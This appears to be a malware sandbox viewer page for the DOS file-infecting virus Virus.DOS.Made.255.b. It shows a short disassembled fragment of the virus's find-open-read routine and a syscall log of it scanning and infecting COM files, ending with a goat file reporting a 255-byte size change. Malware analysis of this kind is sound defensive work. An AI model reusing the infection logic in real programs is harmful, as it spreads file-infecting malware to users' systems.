Sample viewer

vx.netlux.org/Virus.DOS.Made.255.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:30.126167536Z 44 PC: 1412d | Get time 0x1412d: cmp dh, 0xf
0x14130: jle 0x14140
0x14132: cmp dl, 0
0x14135: je 0x14129
0x14137: cmp dh, 0
0x1413a: je 0x14129
0x1413c: mov word ptr [si + 0x116], dx
0x14140: mov bp, word ptr [si + 0x1fc]
0x14144: add bp, 0x103
0x14148: mov ah, 0x1a
0x1414a: lea dx, word ptr [si + 0x20a]
0x1414e: int 0x21
0x14150: lea dx, word ptr [si + 0x1fe]
0x14154: xor cx, cx
0x14156: mov ah, 0x4e
0x14158: int 0x21
0x1415a: jb 0x141c6
0x1415c: mov ax, 0x3d02
0x1415f: lea dx, word ptr [si + 0x228]
0x14163: int 0x21
2018-12-17T22:50:30.129394904Z 26 PC: 14150 | Set disk transfer address
2018-12-17T22:50:30.13054431Z 78 PC: 1415a | Find first file
2018-12-17T22:50:30.137001318Z 61 PC: 14165 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:30.144644275Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:50:30.151096776Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.153901841Z 61 PC: 14165 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:30.161130336Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:50:30.167620541Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.170502719Z 61 PC: 14165 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:30.178507118Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 7)
2018-12-17T22:50:30.185444973Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.188325073Z 61 PC: 14165 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:30.195615545Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 8)
2018-12-17T22:50:30.202510517Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.20516669Z 61 PC: 14165 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:30.21174825Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 9)
2018-12-17T22:50:30.218690467Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.221267637Z 61 PC: 14165 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:30.22762927Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 10)
2018-12-17T22:50:30.234859245Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.237650405Z 61 PC: 14165 | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:30.244204017Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 11)
2018-12-17T22:50:30.251265138Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.254752572Z 61 PC: 14165 | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:30.261879086Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 12)
2018-12-17T22:50:30.265264986Z 66 PC: 1418a | Move file pointer
2018-12-17T22:50:30.266952142Z 63 PC: 141cc | Read file or device (Read 2 bytes on handle 12)
2018-12-17T22:50:30.270146414Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.279452521Z 48 PC: 12a63 | Get DOS version
2018-12-17T22:50:30.280824579Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:50:30.290647029Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-17T22:50:30.297655918Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-17T22:50:30.299212536Z 93 PC: 12b24 | File sharing functions
2018-12-17T22:50:30.300576763Z 9 PC: 12b03 | Display string (String= 'Size change=+00FFh/00255d. Virus might be activ? ')
2018-12-17T22:50:30.304293714Z 76 PC: 12b09 | Terminate with return code (Return code = '1')